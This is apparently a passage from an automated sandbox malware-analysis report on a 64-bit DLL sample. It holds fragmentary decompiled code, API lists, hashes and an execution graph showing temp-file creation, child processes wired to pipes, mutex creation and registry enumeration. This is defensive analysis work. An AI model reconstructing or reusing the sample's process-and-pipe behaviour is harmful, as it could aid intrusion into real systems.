                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2416262065-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:6%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:1028
                  Total number of Limit Nodes:15
                  execution_graph 5489 13301d3 5491 13301de 5489->5491 5494 13301c6 5489->5494 5491->5489 5492 1330219 5491->5492 5491->5494 5495 1333edc 5491->5495 5492->5494 5499 1331c0b 5492->5499 5496 1333f1a 5495->5496 5497 13340bd RtlAllocateHeap 5496->5497 5498 1334020 5496->5498 5497->5498 5498->5491 5500 1331c29 5499->5500 5501 1331c14 5499->5501 5500->5501 5502 1331c1e RtlAllocateHeap 5500->5502 5501->5492 5502->5501 5379 180001844 5380 18000187a 5379->5380 5381 180001a6a 5379->5381 5380->5381 5382 180007b04 3 API calls 5380->5382 5383 18000188d 5382->5383 5383->5381 5384 180001899 GetTempPathW 5383->5384 5385 180001a55 5384->5385 5386 1800018b9 HeapAlloc 5384->5386 5387 180001a5a HeapFree 5385->5387 5386->5385 5388 1800018d5 GetTempPathW 5386->5388 5387->5381 5389 1800018e5 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 5388->5389 5390 180001916 HeapFree 5388->5390 5389->5390 5393 180001927 5389->5393 5390->5393 5391 180001938 StrChrW 5392 180001964 lstrlenW 5391->5392 5391->5393 5392->5393 5393->5385 5393->5391 5394 1800019ef 5393->5394 5396 180001a3c DeleteFileW HeapFree 5393->5396 5401 180009b7c lstrlenA lstrlenW lstrlenW HeapAlloc 5393->5401 5394->5396 5406 180003698 5394->5406 5396->5387 5402 180009bed wnsprintfW 5401->5402 5403 180009c2e 5401->5403 5421 180006754 memset 5402->5421 5403->5393 5432 180001000 CreateFileW 5406->5432 5409 1800036d7 HeapAlloc 5411 180003709 RtlOemStringToUnicodeString 5409->5411 5412 18000375a HeapFree 5409->5412 5410 180001a09 5410->5396 5417 180005bdc 5410->5417 5413 180003731 5411->5413 5414 180003727 RtlNtStatusToDosError 5411->5414 5412->5410 5442 180005a0c WideCharToMultiByte 5413->5442 5415 180003748 HeapFree 5414->5415 5415->5412 5418 180001a27 HeapFree 5417->5418 5419 180005c0b HeapAlloc 5417->5419 5418->5396 5419->5418 5420 180005c23 memcpy EnterCriticalSection LeaveCriticalSection 5419->5420 5420->5418 5422 1800089e4 3 API calls 5421->5422 5423 1800067b1 CreateProcessW 5422->5423 5424 180006801 WaitForMultipleObjects 5423->5424 5425 180006862 GetLastError 5423->5425 5426 18000684a CloseHandle CloseHandle 5424->5426 5427 180006830 5424->5427 5428 18000686a 5425->5428 5426->5428 5427->5426 5429 18000683f TerminateProcess 5427->5429 5430 18000687d HeapFree 5428->5430 5431 18000686f HeapFree 5428->5431 5429->5426 5430->5403 5431->5430 5433 1800010c8 GetLastError 5432->5433 5434 180001059 GetFileSize 5432->5434 5436 18000106a 5433->5436 5435 180001071 HeapAlloc 5434->5435 5434->5436 5435->5433 5437 180001088 ReadFile 5435->5437 5438 1800010d6 CloseHandle 5436->5438 5439 1800010df 5436->5439 5437->5433 5437->5436 5438->5439 5440 1800010f6 5439->5440 5441 1800010e8 HeapFree 5439->5441 5440->5409 5440->5410 5441->5440 5443 180005ad3 GetLastError 5442->5443 5444 180005a6a HeapAlloc 5442->5444 5445 180005aaa 5443->5445 5444->5445 5446 180005a80 WideCharToMultiByte 5444->5446 5445->5415 5446->5445 5447 180005ab4 GetLastError HeapFree 5446->5447 5447->5445 5562 180002f24 HeapAlloc 5563 180002f6e memset CreatePipe 5562->5563 5573 180002f66 5562->5573 5564 180002fcb CreatePipe 5563->5564 5565 180002fbe GetLastError 5563->5565 5564->5565 5566 180002fe5 5564->5566 5565->5573 5576 180001d98 memset 5566->5576 5569 18000459c SetLastError 5570 180003014 5569->5570 5571 18000303e GetLastError 5570->5571 5574 18000304a 5570->5574 5571->5573 5571->5574 5572 18000459c SetLastError 5572->5574 5574->5572 5574->5573 5575 180003089 GetLastError 5574->5575 5575->5573 5577 1800089e4 3 API calls 5576->5577 5578 180001e43 5577->5578 5579 180001e4b memcpy CreateProcessW 5578->5579 5582 180001ec6 5578->5582 5580 180001eb6 HeapFree 5579->5580 5581 180001eae GetLastError 5579->5581 5580->5582 5581->5580 5582->5569 5582->5573 5583 180009344 5584 18000938a 5583->5584 5591 1800094a7 5583->5591 5585 18000459c SetLastError 5584->5585 5586 180009398 5585->5586 5587 18000459c SetLastError 5586->5587 5586->5591 5588 1800093fb 5587->5588 5588->5591 5595 1800070fc memcpy 5588->5595 5590 18000459c SetLastError 5590->5591 5594 180009479 5594->5590 5594->5591 5596 180007189 5595->5596 5597 180007159 5595->5597 5613 18000417c 5596->5613 5597->5596 5599 18000716c memcpy 5597->5599 5599->5597 5600 1800071ee 5600->5591 5600->5594 5603 180007358 5600->5603 5601 18000719b 5601->5600 5619 180004748 5601->5619 5604 18000738b 5603->5604 5632 1800062d8 5604->5632 5607 1800073e3 5609 1800073d3 5607->5609 5610 180007b04 3 API calls 5607->5610 5608 1800073b4 GetModuleHandleA 5608->5609 5609->5594 5611 1800073f2 5610->5611 5611->5609 5612 180007404 HeapFree 5611->5612 5612->5609 5614 180004217 5613->5614 5615 1800041ac 5613->5615 5614->5601 5615->5614 5616 180004206 GetLastError 5615->5616 5617 18000459c SetLastError 5615->5617 5628 180003cc0 5615->5628 5616->5615 5617->5615 5620 18000459c SetLastError 5619->5620 5621 1800047a3 5620->5621 5622 1800047c7 5621->5622 5623 18000490c GetLastError 5621->5623 5624 18000490a 5622->5624 5625 18000459c SetLastError 5622->5625 5626 1800048d4 GetLastError 5622->5626 5627 180004875 GetLastError 5622->5627 5623->5624 5624->5600 5625->5622 5626->5622 5627->5622 5629 180003de7 5628->5629 5631 180003d04 5628->5631 5629->5615 5630 18000459c SetLastError 5630->5631 5631->5629 5631->5630 5633 180006324 5632->5633 5634 180006309 5632->5634 5633->5607 5633->5608 5633->5609 5634->5633 5636 180001624 5634->5636 5637 18000165e 5636->5637 5638 180001696 lstrlenA 5637->5638 5639 180001667 5637->5639 5638->5639 5639->5633 5686 180001b84 5687 180001bb8 5686->5687 5688 180001bce HeapFree 5687->5688 5689 180005600 7 API calls 5687->5689 5689->5688 5657 180008368 CreateEventA 5658 180008598 GetLastError 5657->5658 5659 1800083ae 5657->5659 5675 1800085a0 5658->5675 5660 18000459c SetLastError 5659->5660 5663 1800083c9 5660->5663 5661 1800085aa CloseHandle 5662 1800085b0 5661->5662 5663->5658 5664 1800083ea ResumeThread 5663->5664 5665 1800083f4 GetExitCodeProcess 5664->5665 5665->5658 5672 18000840b 5665->5672 5666 180008593 5666->5658 5666->5675 5667 18000841b PeekNamedPipe 5667->5658 5667->5672 5668 18000844c ReadFile 5668->5658 5668->5672 5670 1800084c6 WriteFile 5670->5658 5670->5672 5671 1800084ee WaitForMultipleObjects 5671->5672 5671->5675 5672->5658 5672->5665 5672->5666 5672->5667 5672->5668 5672->5670 5672->5671 5673 18000459c SetLastError 5672->5673 5674 18000854e WriteFile 5672->5674 5672->5675 5677 18000858b GetLastError 5672->5677 5678 180004258 5672->5678 5673->5672 5676 180008571 ResetEvent 5674->5676 5674->5677 5675->5661 5675->5662 5676->5665 5677->5666 5680 180004287 5678->5680 5679 18000459c SetLastError 5679->5680 5680->5679 5681 1800042fa 5680->5681 5681->5672 5361 1800025ec SleepEx 5362 180002609 5361->5362 5363 18000261b 5361->5363 5362->5363 5364 180002612 WaitForSingleObject 5362->5364 5364->5363 5448 180004c4c 5449 180004c6d EnterCriticalSection LeaveCriticalSection 5448->5449 5452 180002770 5449->5452 5453 180008308 SetLastError 5452->5453 5454 180002782 5453->5454 5455 180008308 SetLastError 5454->5455 5456 18000278a 5455->5456 5457 180002791 GetCurrentThreadId 5456->5457 5460 1800027b3 5456->5460 5458 1800027a9 CloseHandle 5457->5458 5459 18000279c WaitForSingleObject 5457->5459 5458->5460 5459->5458 5682 180007d6f 5683 180007d83 5682->5683 5684 180007d87 5683->5684 5685 180007d8c HeapFree 5683->5685 5685->5684 5503 180001110 5504 18000459c SetLastError 5503->5504 5505 18000113c 5504->5505 5506 180001175 5505->5506 5507 180001166 GetLastError 5505->5507 5507->5506 4487 1330000 4488 1330002 4487->4488 4490 1330017 4488->4490 4491 13301c1 4488->4491 4492 13303a5 4491->4492 4494 13337a7 4492->4494 4495 13337a9 4494->4495 4497 13337ae 4495->4497 4498 1333880 4495->4498 4497->4492 4500 1333882 4498->4500 4499 1333a5f RtlAllocateHeap 4501 1333c82 4499->4501 4500->4499 4502 133392e 4500->4502 4501->4497 4502->4497 4503 180001334 4504 180001343 4503->4504 4505 180001357 4503->4505 4507 18000134f 4504->4507 4511 180004f1c HeapCreate 4504->4511 4522 180005578 4505->4522 4510 18000136a HeapDestroy 4510->4507 4513 180004f5d 4511->4513 4521 180005069 4511->4521 4512 180004ffc 4514 180005005 HeapDestroy 4512->4514 4515 180005010 HeapAlloc 4512->4515 4513->4512 4516 180004f8e HeapAlloc 4513->4516 4514->4521 4517 180005049 4515->4517 4518 180005039 HeapDestroy 4515->4518 4519 180004fb3 4516->4519 4531 18000508c HeapAlloc 4517->4531 4518->4521 4519->4512 4521->4507 4523 18000559a 4522->4523 4524 18000135e 4523->4524 4525 1800055b5 4523->4525 4526 1800055af SetEvent 4523->4526 4524->4507 4524->4510 4527 1800055bc Sleep 4525->4527 4528 1800055d0 4525->4528 4526->4525 4527->4527 4527->4528 4529 1800055d9 CloseHandle 4528->4529 4530 1800055df HeapFree 4528->4530 4529->4530 4530->4524 4532 180005419 4531->4532 4533 1800050e0 memset InitializeCriticalSection 4531->4533 4532->4521 4580 180008b44 GetModuleHandleA 4533->4580 4536 1800052f8 4538 180005578 4 API calls 4536->4538 4540 180005417 4538->4540 4540->4532 4543 18000515b HeapAlloc 4546 180005226 4543->4546 4547 18000518a RegOpenKeyW 4543->4547 4544 180005150 GetLastError 4545 180005408 4544->4545 4545->4532 4545->4536 4546->4536 4549 180005234 memcpy 4546->4549 4548 180005216 HeapFree 4547->4548 4557 1800051b2 4547->4557 4548->4546 4599 180005ca4 4549->4599 4550 1800051cf RegEnumKeyW 4552 1800051ee RegCloseKey 4550->4552 4550->4557 4552->4548 4552->4549 4556 18000529a 4556->4536 4615 180006dcc 4556->4615 4557->4550 4557->4552 4638 180009110 4557->4638 4558 180005ca4 6 API calls 4558->4556 4561 1800052e2 4561->4536 4625 180008708 4561->4625 4562 1800052b8 4642 180003c24 HeapAlloc 4562->4642 4566 180003c24 2 API calls 4567 1800052d7 4566->4567 4567->4561 4568 1800052f3 4568->4536 4569 180005361 4568->4569 4569->4536 4570 180005376 GetModuleHandleA 4569->4570 4571 180005393 4570->4571 4572 1800053fb 4570->4572 4573 18000459c SetLastError 4571->4573 4646 180002b60 4572->4646 4575 1800053a1 4573->4575 4576 1800053a9 GetCurrentThreadId 4575->4576 4577 1800053b9 4575->4577 4576->4577 4577->4544 4578 18000459c SetLastError 4577->4578 4579 1800053d8 4578->4579 4579->4532 4579->4544 4686 180007b94 4580->4686 4583 180008b81 GetModuleHandleA 4585 180007b94 3 API calls 4583->4585 4584 18000510d 4584->4536 4588 180007678 4584->4588 4586 180008b9d 4585->4586 4586->4584 4693 180002464 LoadLibraryA 4586->4693 4589 18000459c SetLastError 4588->4589 4590 1800076ae GetModuleHandleA 4589->4590 4592 1800076d5 4590->4592 4594 180005120 4590->4594 4593 18000459c SetLastError 4592->4593 4593->4594 4595 18000459c 4594->4595 4596 1800045b0 4595->4596 4597 1800045d3 SetLastError 4596->4597 4598 1800045de 4596->4598 4597->4598 4598->4543 4598->4544 4600 18000459c SetLastError 4599->4600 4601 180005cde 4600->4601 4602 180005ce5 CreateFileW 4601->4602 4603 180005d0b 4601->4603 4602->4603 4604 180005d18 RtlInitUnicodeString 4603->4604 4605 180005dcd GetLastError 4603->4605 4607 18000459c SetLastError 4604->4607 4606 18000527b 4605->4606 4606->4556 4606->4558 4608 180005d3c 4607->4608 4609 180005d41 NtQueryDirectoryFile 4608->4609 4610 180005d92 4608->4610 4609->4610 4612 18000459c SetLastError 4610->4612 4614 180005d9b 4610->4614 4611 180005dc2 CloseHandle 4611->4606 4613 180005db7 4612->4613 4613->4611 4613->4614 4614->4611 4700 1800089e4 4615->4700 4618 180006e21 lstrlenW 4620 180006e38 lstrcmpiW 4618->4620 4621 180006e4f 4618->4621 4619 1800052b1 4619->4561 4619->4562 4620->4621 4622 180006e7a HeapFree 4620->4622 4711 180002594 4621->4711 4622->4619 4626 180008759 4625->4626 4627 1800087f7 4626->4627 4721 1800030c8 4626->4721 4627->4568 4630 18000459c SetLastError 4631 1800087a9 4630->4631 4632 1800087ae CreateMutexW 4631->4632 4633 1800087c0 4631->4633 4632->4633 4634 1800087c8 GetLastError 4633->4634 4635 1800087e9 HeapFree 4633->4635 4636 1800087d5 FindCloseChangeNotification 4634->4636 4637 1800087e0 4634->4637 4635->4627 4636->4635 4637->4635 4639 1800091cd 4638->4639 4640 18000914a 4638->4640 4639->4557 4640->4639 4641 18000919e memcpy 4640->4641 4641->4639 4643 180003c66 4642->4643 4645 180003c9c 4642->4645 4644 180003c76 _snprintf 4643->4644 4644->4644 4644->4645 4645->4561 4645->4566 4647 180002464 6 API calls 4646->4647 4648 180002ba5 4647->4648 4649 180002bd9 4648->4649 4650 180002464 6 API calls 4648->4650 4651 180002f0d 4649->4651 4730 180008c60 HeapAlloc 4649->4730 4652 180002bbc 4650->4652 4651->4545 4652->4649 4654 180002bc2 HeapFree 4652->4654 4654->4649 4655 180002ed2 4656 180002ee5 HeapFree 4655->4656 4657 180002ef8 4655->4657 4656->4657 4657->4651 4659 180002f01 HeapFree 4657->4659 4658 180002beb 4658->4655 4660 180002ec8 4658->4660 4740 1800022ac memset 4658->4740 4659->4651 4819 180002620 4660->4819 4665 18000459c SetLastError 4667 180002cc6 4665->4667 4666 180002c8a 4666->4665 4667->4660 4668 180002370 2 API calls 4667->4668 4669 180002d20 4668->4669 4670 180002d41 4669->4670 4753 180002668 lstrlenA HeapAlloc 4669->4753 4672 180002370 2 API calls 4670->4672 4673 180002d5f 4672->4673 4674 180002370 2 API calls 4673->4674 4676 180002dad 4674->4676 4675 180002370 2 API calls 4677 180002dfa 4675->4677 4676->4675 4679 180002e16 GetSystemTimeAsFileTime 4677->4679 4680 180002e40 4677->4680 4679->4680 4682 18000459c SetLastError 4680->4682 4683 180002e9e 4680->4683 4762 180007dbc 4680->4762 4786 18000137c 4680->4786 4682->4680 4683->4660 4795 180007950 4683->4795 4687 180007d87 4686->4687 4688 180007beb 4686->4688 4687->4583 4687->4584 4688->4687 4689 180007bf9 RtlAllocateHeap 4688->4689 4689->4687 4690 180007c2a memset 4689->4690 4692 180007c69 4690->4692 4691 180007d8c HeapFree 4691->4687 4692->4687 4692->4691 4694 180002484 4693->4694 4695 1800024af GetLastError 4693->4695 4697 180007b94 3 API calls 4694->4697 4696 180002497 4695->4696 4696->4584 4698 180002491 4697->4698 4698->4696 4699 1800024a4 FreeLibrary 4698->4699 4699->4696 4701 180008a19 4700->4701 4702 180006e17 4701->4702 4703 18000459c SetLastError 4701->4703 4702->4618 4702->4619 4704 180008a38 4703->4704 4704->4702 4705 180008a51 HeapAlloc 4704->4705 4705->4702 4706 180008a6b 4705->4706 4707 18000459c SetLastError 4706->4707 4708 180008a79 4707->4708 4709 180008a91 4708->4709 4710 180008a9d HeapFree 4708->4710 4709->4702 4710->4702 4712 1800025b8 4711->4712 4717 1800072a4 4712->4717 4718 1800072df 4717->4718 4719 1800072f7 memcpy 4718->4719 4720 180007310 4718->4720 4719->4720 4722 180003117 4721->4722 4723 18000310a lstrlenW 4721->4723 4724 18000311a HeapAlloc 4722->4724 4723->4724 4725 18000319c 4724->4725 4726 180003134 4724->4726 4725->4627 4725->4630 4727 180003154 4726->4727 4728 18000313c memcpy 4726->4728 4729 18000315c memcpy 4727->4729 4728->4727 4729->4725 4729->4727 4731 180008cb9 memset 4730->4731 4738 180008d09 4730->4738 4732 180002464 6 API calls 4731->4732 4733 180008cde 4732->4733 4734 180008ce4 HeapAlloc 4733->4734 4736 180008cfe 4733->4736 4735 180008d0b 4734->4735 4734->4736 4739 180008d3a InitializeCriticalSection 4735->4739 4737 180002620 2 API calls 4736->4737 4737->4738 4738->4658 4739->4738 4822 180001c00 lstrlenA HeapAlloc 4740->4822 4743 180001c00 4 API calls 4744 18000230f 4743->4744 4745 180001c00 4 API calls 4744->4745 4747 180002348 4744->4747 4746 18000232b 4745->4746 4746->4747 4825 180008d78 4746->4825 4747->4660 4749 180002370 4747->4749 4750 180002385 4749->4750 4752 1800023a9 4750->4752 4859 1800094e0 4750->4859 4752->4666 4754 1800026c4 4753->4754 4755 180002749 4753->4755 4756 1800026e3 4754->4756 4757 1800026d4 lstrcpyA 4754->4757 4755->4670 4758 18000459c SetLastError 4756->4758 4757->4756 4759 1800026f9 4758->4759 4760 180002721 CloseHandle 4759->4760 4761 18000272c GetLastError HeapFree 4759->4761 4760->4755 4761->4755 4864 180001cb0 4762->4864 4767 180007fff 4768 180007f3a 4767->4768 4769 1800045e8 4 API calls 4767->4769 4771 180007f91 4768->4771 4772 180007f68 GetSystemTimeAsFileTime 4768->4772 4769->4768 4776 180007fba HeapFree 4771->4776 4777 180007fdc 4771->4777 4772->4771 4774 180007f78 4772->4774 4774->4771 4919 1800045e8 4774->4919 4775 180007ed8 4782 180007eef 4775->4782 4900 1800023b8 4775->4900 4778 180007fcc 4776->4778 4777->4680 4778->4777 4925 180008bc4 4778->4925 4782->4767 4906 1800099f4 4782->4906 4785 180007fef HeapFree 4785->4767 4787 180001605 4786->4787 4792 1800013b1 4786->4792 4787->4680 4788 180001531 memcpy 4788->4792 4789 180001593 HeapAlloc 4790 1800015aa memcpy 4789->4790 4789->4792 4791 1800015cb 4790->4791 5276 180005748 4791->5276 4792->4787 4792->4788 4792->4789 4796 180007959 4795->4796 4797 180002eba HeapFree 4795->4797 4798 180007a57 DeleteCriticalSection 4796->4798 4799 18000798d SetEvent 4796->4799 4797->4660 4798->4797 5355 180008308 4799->5355 4802 1800079a3 WaitForSingleObject CloseHandle 4803 1800079ba 4802->4803 4804 1800079c3 CloseHandle 4803->4804 4805 1800079c9 EnterCriticalSection 4803->4805 4804->4805 4806 1800079df 4805->4806 4807 1800079f0 LeaveCriticalSection 4806->4807 4808 180008308 SetLastError 4806->4808 4809 180007a09 4807->4809 4808->4806 4810 180007a01 Sleep 4809->4810 4811 180007a0e 4809->4811 4810->4809 4812 180007a15 Sleep 4811->4812 4813 180007a26 4811->4813 4812->4812 4812->4813 4814 180007a35 4813->4814 4815 180007a2f CloseHandle 4813->4815 4816 180007a44 4814->4816 4817 180007a3e CloseHandle 4814->4817 4815->4814 4816->4798 4818 180007a4c HeapFree 4816->4818 4817->4816 4818->4798 4820 180002641 HeapFree 4819->4820 4821 18000264c HeapFree 4819->4821 4820->4821 4823 180001c6d 4822->4823 4824 180001c4d memcpy memset 4822->4824 4823->4743 4823->4747 4824->4823 4826 180002370 2 API 